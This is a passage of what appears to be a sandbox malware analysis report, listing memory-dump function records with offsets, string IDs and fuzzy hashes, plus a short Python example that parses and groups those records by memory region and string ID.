                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 27c00b0832f04a85f191ff23760b1d51990ffe12cba17a661193571e2c7ee6b1
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 565189B5E01658CFDB58CFAAC9446DDBBF6AFC9301F14C0AAD409AB264DB345A85CF40
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1488327453.0000000005E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E70000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_5e70000_VFylJFPzqX.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: uj
                                                                                                                                                                                                                                        • API String ID: 0-3203798794
                                                                                                                                                                                                                                        • Opcode ID: 5a62a1330b758362639030e7460fd760b38084522ece7bf916b4989149b130a1
                                                                                                                                                                                                                                        • Instruction ID: e5d5b5a1c005a897faadd7ee447b2a9066084bd9b8cffacb702f8d59275207c8
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 5a62a1330b758362639030e7460fd760b38084522ece7bf916b4989149b130a1
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 39413975E052199FCB08CFAAE4405EEFBB2FF89310F10946AD816E7254E7349A41CF54
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1490540594.000000000A210000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A210000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_a210000_VFylJFPzqX.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: _7i,
                                                                                                                                                                                                                                        • API String ID: 0-367628272
                                                                                                                                                                                                                                        • Opcode ID: 8b856d90e69e884d95d1393162b92fa12ffa9dd758249b341b46cd22f8b12577
                                                                                                                                                                                                                                        • Instruction ID: 7597c114e90af12b46b7b851ed82359886fd0b8d2104b34ffa613e849a26c06a
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8b856d90e69e884d95d1393162b92fa12ffa9dd758249b341b46cd22f8b12577
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4F416DB4D2520AEFCB14DFA6D4805EFBFF2AF95300F10842AD415B7250D77586428F95
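The records above are the per-function output of the Joe Sandbox IDA plugin over memory dumps of the sample process, and a listing this long is easier to triage once parsed. The following Python is an added example (not part of this report and not Joe Sandbox code) that parses records in this layout, cross-checks each .sdmp file name against its Offset column, and groups functions by memory region and by String ID. The three embedded records are copied from the listing above; the record layout, and reading the fourth dotted field of the .sdmp name as the region base address, are assumptions drawn only from what this page shows.

```python
import re
from collections import Counter, defaultdict

# Constructed input: three records copied from the listing above (two from the
# 05620000 dump, one from 0A210000) in the bullet layout the Joe Sandbox IDA
# plugin emits, with the leading whitespace stripped.
SAMPLE = """\
Strings
Memory Dump Source
• Source File: 00000000.00000002.1486957684.0000000005620000.00000040.00000800.00020000.00000000.sdmp, Offset: 05620000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_5620000_VFylJFPzqX.jbxd
Similarity
• API ID:
• String ID: -Ex
• API String ID: 0-3578307018
• Opcode ID: 39bc56f1f3333c4eefb23cf4e53caf7f8c8a3f6a8d3fa567b8181e4ebaf95beb
• Instruction ID: 349082d162958c17bb9fd06295ed4991bcecb0c17abf8b5f3f06a38271b33f52
• Opcode Fuzzy Hash: 39bc56f1f3333c4eefb23cf4e53caf7f8c8a3f6a8d3fa567b8181e4ebaf95beb
• Instruction Fuzzy Hash: 32610674E04618DFCB08DFE6E884A9DBBB2FF89301F10846AD405A7354DB345A46DF51
Strings
Memory Dump Source
• Source File: 00000000.00000002.1486957684.0000000005620000.00000040.00000800.00020000.00000000.sdmp, Offset: 05620000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_5620000_VFylJFPzqX.jbxd
Similarity
• API ID:
• String ID: -Ex
• API String ID: 0-3578307018
• Opcode ID: 3e66b99531cc166b808bb50f0ad2a4598997961ca9a061bbb0a37fac809e29d5
• Instruction ID: 8eaface96235e8684cd3b98072e3116b8d44dadbb52eae594301b5014f831e66
• Opcode Fuzzy Hash: 3e66b99531cc166b808bb50f0ad2a4598997961ca9a061bbb0a37fac809e29d5
• Instruction Fuzzy Hash: A461D374E04618DFCB04DFE6E884AADBBB2FF89301F10846AD816A7358DB355A46DF50
Strings
Memory Dump Source
• Source File: 00000000.00000002.1490540594.000000000A210000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A210000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_a210000_VFylJFPzqX.jbxd
Similarity
• API ID:
• String ID: _7i,
• API String ID: 0-367628272
• Opcode ID: 01515e38369b1e617a3cccc05ba78ad1995763e5d3faacd2fe0e03ef6655860b
• Instruction ID: d57cd8351d96e976c3a93443701e17970e03583816e56c401d0eea443cd55d7c
• Opcode Fuzzy Hash: 01515e38369b1e617a3cccc05ba78ad1995763e5d3faacd2fe0e03ef6655860b
• Instruction Fuzzy Hash: A1516EB0D2520AEFCB18DFA6D4816EEBBF6EF95300F10846AD419B7250D7758642CF91
"""

# "• Key: value"; the key never contains ':' so a value such as "{:u" survives.
FIELD = re.compile(r"^•\s*([^:]+):\s*(.*)$")


def _key(name):
    return name.strip().lower().replace(" ", "_")


def parse_records(text):
    """One dict per record; each 'Strings' header line opens a new record.
    The Source File line holds three comma-separated values (file, Offset,
    based on PE), which are split into their own keys."""
    records, cur = [], None
    for line in text.splitlines():
        line = line.strip()
        if line == "Strings":
            cur = {}
            records.append(cur)
            continue
        m = FIELD.match(line)
        if cur is None or not m:  # section labels (Similarity, ...) carry no data
            continue
        key, val = _key(m.group(1)), m.group(2).strip()
        if key != "source_file":
            cur[key] = val
            continue
        parts = [p.strip() for p in val.split(",")]
        cur["source_file"] = parts[0]
        for p in parts[1:]:
            k, v = p.split(":", 1)
            cur[_key(k)] = v.strip()
        cur["based_on_pe"] = cur.get("based_on_pe", "").lower() == "true"
    return records


def sdmp_base_matches_offset(rec):
    """Cross-check the dump name against the Offset column. Assumption: the
    fourth dotted field of the .sdmp name is the region base address (it equals
    Offset in every record on this page)."""
    return int(rec["source_file"].split(".")[3], 16) == int(rec["offset"], 16)


def region_summary(records):
    """Number of listed functions per memory region, keyed by Offset."""
    return dict(Counter(r["offset"] for r in records))


def string_ids_by_region(records):
    """Regions each String ID was recovered from; an ID seen in several
    regions means the same code sits in more than one dump."""
    out = defaultdict(set)
    for r in records:
        out[r["string_id"]].add(r["offset"])
    return {k: sorted(v) for k, v in out.items()}


def non_pe_regions(records):
    """Regions whose dump was not based on a PE image (no PE header to rebuild
    from); for a sample that injects and hollows, unpacked code tends to sit here."""
    return sorted({r["offset"] for r in records if not r["based_on_pe"]})
```

Running `parse_records` over the whole listing and feeding the result to `string_ids_by_region` shows which recovered functions recur across the 05620000, 05E70000, 073C0000 and 0A210000 dumps. Note that in every record on this page the Opcode ID and the Opcode Fuzzy Hash are the same value, so the Instruction Fuzzy Hash is the field that separates near-duplicate functions such as the two `-Ex` records from 05620000.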
Strings
Memory Dump Source
• Source File: 00000000.00000002.1490540594.000000000A210000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A210000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_a210000_VFylJFPzqX.jbxd
Similarity
• API ID:
• String ID: _7i,
• API String ID: 0-367628272
                                                                                                                                                                                                                                        • Opcode ID: d4a76e0769c0736bfbd229a05be22ac6461eb761526fad9abb1120c8332d4982
                                                                                                                                                                                                                                        • Instruction ID: 555bb9990e3b5b7b338d7d8a6d756da4aaeeee118954416dc6f54d1ca629aefc
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d4a76e0769c0736bfbd229a05be22ac6461eb761526fad9abb1120c8332d4982
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 47416BB4D2520AEFCB14DFAAD4805EFFBF2AF89300F10942AD415B7214D7759A428F94
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1488327453.0000000005E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E70000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_5e70000_VFylJFPzqX.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: uj
                                                                                                                                                                                                                                        • API String ID: 0-3203798794
                                                                                                                                                                                                                                        • Opcode ID: 7ac8371f490b8f082cfccb904d7b2b40a3e71a042b55744c6b8865f0a9046c92
                                                                                                                                                                                                                                        • Instruction ID: 70abb9a4eec9e7c9b2225d3e2a57fbe36ea329b058e496b52a42af5d1e20d671
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7ac8371f490b8f082cfccb904d7b2b40a3e71a042b55744c6b8865f0a9046c92
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A1411875E056199FCB08CFAAE8445EEFBB6FF89200F10942AD816A7254EB349A01CF54
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1486957684.0000000005620000.00000040.00000800.00020000.00000000.sdmp, Offset: 05620000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_5620000_VFylJFPzqX.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: :sF
                                                                                                                                                                                                                                        • API String ID: 0-2912757881
                                                                                                                                                                                                                                        • Opcode ID: f4cdb7e03848ac990bb546706c5a129ca30dfa3229db53ec851b1dcecac06aa5
                                                                                                                                                                                                                                        • Instruction ID: bb90a0bda574f57ab91abd405166fcb48b62d1a12cf1e9d4b274490036f61b62
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f4cdb7e03848ac990bb546706c5a129ca30dfa3229db53ec851b1dcecac06aa5
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: EE41DCB1E056189BDB18CF6AD94469EBBF3AFC9300F14C5A59409AB314EB345A86CF40
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1490540594.000000000A210000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A210000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_a210000_VFylJFPzqX.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: p
                                                                                                                                                                                                                                        • API String ID: 0-2181537457
                                                                                                                                                                                                                                        • Opcode ID: 8a29185bedc7fe6937809f4c20e286545fd233e04df74be6040ca9ab5c12e0fe
                                                                                                                                                                                                                                        • Instruction ID: db0f87121842280ecf7624050973de5988f135f35e104723e6b27d7242df4513
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8a29185bedc7fe6937809f4c20e286545fd233e04df74be6040ca9ab5c12e0fe
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8231EC71E056189BEB58CF6BD840B9EFBF7BFC8200F14C1BAD508A6264DB341A458F51
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1489728560.00000000073C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073C0000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_73c0000_VFylJFPzqX.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: _k
                                                                                                                                                                                                                                        • API String ID: 0-789278910
                                                                                                                                                                                                                                        • Opcode ID: 5332a96111692bc212790e9d698aa07b152b3ef7807a14efae60eaaad3558bf5
                                                                                                                                                                                                                                        • Instruction ID: 74ea1b384475534f190376215f54397ed55107bf7e9c569e8f521da6814f4eb4
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 5332a96111692bc212790e9d698aa07b152b3ef7807a14efae60eaaad3558bf5
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7131CAB1E056289BEB18CF6BD85579EFAF3BFC9300F04C1BA951CA6254DB740A858F41
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1489728560.00000000073C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073C0000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_73c0000_VFylJFPzqX.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: _k
                                                                                                                                                                                                                                        • API String ID: 0-789278910
                                                                                                                                                                                                                                        • Opcode ID: 73178ece37dce15626f08ebfe4abc0b3a3de6b35a9fcb7882edb1a868d2d8d5e
                                                                                                                                                                                                                                        • Instruction ID: 7d9dc09fd081c83f25ba42a949680bc6404f3aabc85968f81e6fcb5c2d333b60
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 73178ece37dce15626f08ebfe4abc0b3a3de6b35a9fcb7882edb1a868d2d8d5e
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9D31BBB1E016289BEB18CF6BD94479EFAF3BFC9300F04C1BA954CA6254DB740A858F41
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1488327453.0000000005E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E70000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_5e70000_VFylJFPzqX.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: bc4680dc4726548c5a00928065208efab63bb223d92e4c9053ab3d5770ae9f91
                                                                                                                                                                                                                                        • Instruction ID: b3313a1acd56014a91931c32964f764e3cbb6453cd29bed61bcd20ee2d3efd4f
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: bc4680dc4726548c5a00928065208efab63bb223d92e4c9053ab3d5770ae9f91
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3052A031B002188FEB58EB78C858B6E77A6BFC8714F548569E44ADB391DF34DD028B91
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1488232394.0000000005E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E50000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_5e50000_VFylJFPzqX.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: 3c383e2b62dfd210393acd12deb269121b65f4ef500fd1c0caa7f84c3e667259
                                                                                                                                                                                                                                        • Instruction ID: f3e8c7a1dbd6c8dcbe28b319a2aaa7731cc163ad86e3ac497bd8d5606f742196
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3c383e2b62dfd210393acd12deb269121b65f4ef500fd1c0caa7f84c3e667259
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: DD527C30A007558FDB14DF28C844B99B7B2BFC9314F2586E9D4586F3A2DB71A986CF81
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1488232394.0000000005E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E50000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_5e50000_VFylJFPzqX.jbxd
                                                                                                                                                                                                                                        Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 2c881a8c1753f2be6335099fe123f60b7ea0a0389f34992f16a137f6017e5a17
• Instruction ID: 6dce446243ec6849c2bf0a558a55d0576a2e3c280c112c2596518debb6bbdd68
• Opcode Fuzzy Hash: 2c881a8c1753f2be6335099fe123f60b7ea0a0389f34992f16a137f6017e5a17
• Instruction Fuzzy Hash: 83526C30A007558FDB14DF28C844B99B7B2BFC5314F2586E9D4586F3A2DB71AA86CF81
Memory Dump Source
• Source File: 00000000.00000002.1470345803.0000000000C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C30000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c30000_VFylJFPzqX.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: b8699b3f70433c1c70461705d4acd5230ab2dea60d1829b09d690e5b17ccb64a
• Instruction ID: 6941d5ac6d242d2a3d46f5adca760a4bcda6e2a203d8fa6d1c8c8f2da494aa88
• Opcode Fuzzy Hash: b8699b3f70433c1c70461705d4acd5230ab2dea60d1829b09d690e5b17ccb64a
• Instruction Fuzzy Hash: 34227A70A002189FDB14DF69C854BAEBBF6BF88304F248569E819DB391DB30DD46DB90
Memory Dump Source
• Source File: 00000000.00000002.1470345803.0000000000C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C30000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c30000_VFylJFPzqX.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 05f06bdc3ad7690747a105a749ea3857b3e67daf37c3caf769cb38465bf27d6f
• Instruction ID: 5dfec7aa64aa2ac65389ba798377534a1d58b885fab82794d80c95dbd06734e0
• Opcode Fuzzy Hash: 05f06bdc3ad7690747a105a749ea3857b3e67daf37c3caf769cb38465bf27d6f
• Instruction Fuzzy Hash: F3028FB1A14209DFCB24CFA9C984AADBBF2FF88304F158569E815AB261D731ED41DF50
Memory Dump Source
• Source File: 00000000.00000002.1470345803.0000000000C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C30000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c30000_VFylJFPzqX.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: e6012ce30d98834736b030360fa8b6b83aca0c50c7a4c09861be952bbdcc4970
• Instruction ID: 60993dc657c1a77a4f40e74767fc1c2dd8f930854c4cfd386806dc02b738161d
• Opcode Fuzzy Hash: e6012ce30d98834736b030360fa8b6b83aca0c50c7a4c09861be952bbdcc4970
• Instruction Fuzzy Hash: 6702E574E00219CFDB14DFA9C884B9DBBB2FF88304F1580A9E819AB265DB319D85DF51
Memory Dump Source
• Source File: 00000000.00000002.1489728560.00000000073C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_73c0000_VFylJFPzqX.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: a2ef347b5521fee2d81cd14419a886095ded4a9a85b14d5e77a7be29c32a9de8
• Instruction ID: 7b425eaf0fc1200e2ff3b890c03f9d565b832ce11390b6d868b255c7fb7b9abc
• Opcode Fuzzy Hash: a2ef347b5521fee2d81cd14419a886095ded4a9a85b14d5e77a7be29c32a9de8
• Instruction Fuzzy Hash: D6D135B4D16309CFDB04DFA2E4446AEBBB2FF4A301F10942ED41AA7298D7359A41CF55
Memory Dump Source
• Source File: 00000000.00000002.1470345803.0000000000C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C30000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c30000_VFylJFPzqX.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 30be765fc110b6f3f8aa49934857380c7f3c1b8a95fc942297b94a748162cb09
• Instruction ID: b86d608e926b363a2d932ea26dba875a0488ce111da8b13ac19e45fba3563301
• Opcode Fuzzy Hash: 30be765fc110b6f3f8aa49934857380c7f3c1b8a95fc942297b94a748162cb09
• Instruction Fuzzy Hash: 12A19374E002188FDB54DFA9D891B9EBBF2BF88300F14C16AD819AB355DB309946DF90
Memory Dump Source
• Source File: 00000000.00000002.1489728560.00000000073C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_73c0000_VFylJFPzqX.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 8c4d07fc0272bab9e8ede7add09932a1d6175435e7b4d0a924befe81781d148a
• Instruction ID: 29e17695906612892101937c74579b36bdc30d5fdf8eeb36649859913ee9a624
• Opcode Fuzzy Hash: 8c4d07fc0272bab9e8ede7add09932a1d6175435e7b4d0a924befe81781d148a
• Instruction Fuzzy Hash: 7891F6B4E01208CFDB08DFA5D945BAEBBB2FF89301F219029D509AB254DB35AD42DF50
Memory Dump Source
• Source File: 00000000.00000002.1489728560.00000000073C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_73c0000_VFylJFPzqX.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 6bb7c023da370eff5707669a1fb309ce9735cbb024ef81d2fa64aec5749ab564
• Instruction ID: 0560a4e76fe7035f018fe239ae4f5c407ef3675f7924c3d70790ea78a209c19e
• Opcode Fuzzy Hash: 6bb7c023da370eff5707669a1fb309ce9735cbb024ef81d2fa64aec5749ab564
• Instruction Fuzzy Hash: FF9108B4E01208CFDB08DFA5D945BAEBBB2FF89301F218029D509AB254DB356D42DF51
Memory Dump Source
• Source File: 00000000.00000002.1489728560.00000000073C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_73c0000_VFylJFPzqX.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 5f649273d668f20dc5743b2b626f73bd1d93c21455faad7aff99ba7729f26d4a
• Instruction ID: 65efeb328555a6978cdfd535a742bbdfd4d19e092b46c8af73ea0d86e301df60
• Opcode Fuzzy Hash: 5f649273d668f20dc5743b2b626f73bd1d93c21455faad7aff99ba7729f26d4a
• Instruction Fuzzy Hash: 7B91C4B4E102198FDB48CFEAC94469EFBB6FF89310F24942AD419AB258D7349901CF64
Memory Dump Source
• Source File: 00000000.00000002.1490540594.000000000A210000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A210000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_a210000_VFylJFPzqX.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 8baf659765b09d86b512d836d55afdf1e16319654c3d16abe66864f9bf8f90f4
• Instruction ID: 913cc24c7d4c76342d33ad4591bd400b4a7a8eaaa319e1a234de46f1e23115ea
• Opcode Fuzzy Hash: 8baf659765b09d86b512d836d55afdf1e16319654c3d16abe66864f9bf8f90f4
• Instruction Fuzzy Hash: 95813374D22219DFCB18CFA5D9846AEBBF2BB88380F20902AD406BB354DB745A41CF55
Memory Dump Source
• Source File: 00000000.00000002.1490540594.000000000A210000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A210000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_a210000_VFylJFPzqX.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 4cceec2ca16b88910a970d85170b084143be8477513285803d2e6beb58d39db4
• Instruction ID: 7d3b11d435d064fd89fcaf59347ce7d2d78f09e2dc903de7eb6f54d04fbbd2ae
• Opcode Fuzzy Hash: 4cceec2ca16b88910a970d85170b084143be8477513285803d2e6beb58d39db4
• Instruction Fuzzy Hash: 1671F8B4E11208DFDB48DFA6D8855AEBFB2FF88345F60802AE45AA7354DB309945CF50
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1490540594.000000000A210000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A210000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_a210000_VFylJFPzqX.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: 44ce9f1d7ba98afc4f74d201af28d79568474c065e2e909846cd12f1f5c64b04
                                                                                                                                                                                                                                        • Instruction ID: d13b8635a13e86e82b089c8cdf69bea20e3e4dea3f37e69894fe25533029ab3e
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 44ce9f1d7ba98afc4f74d201af28d79568474c065e2e909846cd12f1f5c64b04
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9D71F6B4E10208DFDB48DFA6D98559EBFB2FF88340F60842AE45AAB354DB309945CF50
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1489728560.00000000073C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073C0000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_73c0000_VFylJFPzqX.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: f226ab01032f4f56692e3a750d6d263606d57efe7f02cb9fe884d43473131222
                                                                                                                                                                                                                                        • Instruction ID: 0e9e0e77545ff95a31af151b9072d821fa3fbec18baeedbcdd62388715d8f93c
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f226ab01032f4f56692e3a750d6d263606d57efe7f02cb9fe884d43473131222
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 48614AB4D0524ADFDB04CFAAD5806AEFFB2EF89300F14D42AD119A7214D7398A428F91
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1490540594.000000000A210000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A210000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_a210000_VFylJFPzqX.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: d23c9c0774690ad2f95dbe38927c653b33375f5246dd073fb5cdff942edec80b
                                                                                                                                                                                                                                        • Instruction ID: 2f674e3969eea52b7dcbec83814449c22e6f0d0d784f927231c1f7bd7ef1b800
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d23c9c0774690ad2f95dbe38927c653b33375f5246dd073fb5cdff942edec80b
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D56179B0D25219EFCB18DFA5C585AEEBBB5FF88340F10942AE45AA7240DB745A01CF94
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1490540594.000000000A210000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A210000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_a210000_VFylJFPzqX.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: 13a6b5d26417d12a1e3cac7b35c27d26d64bc105d5a00cd78d4818d950abd71e
                                                                                                                                                                                                                                        • Instruction ID: 49d66c44d0f4a7d2a324e24c39cd575fb91ab9a2343b1bd1f7f835bac581e180
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 13a6b5d26417d12a1e3cac7b35c27d26d64bc105d5a00cd78d4818d950abd71e
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 46518CB0D25219EFCB18DFA5C585AAEBBF1FF88341F10953AE01AA7250DB745A01CF85
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1489728560.00000000073C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073C0000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_73c0000_VFylJFPzqX.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
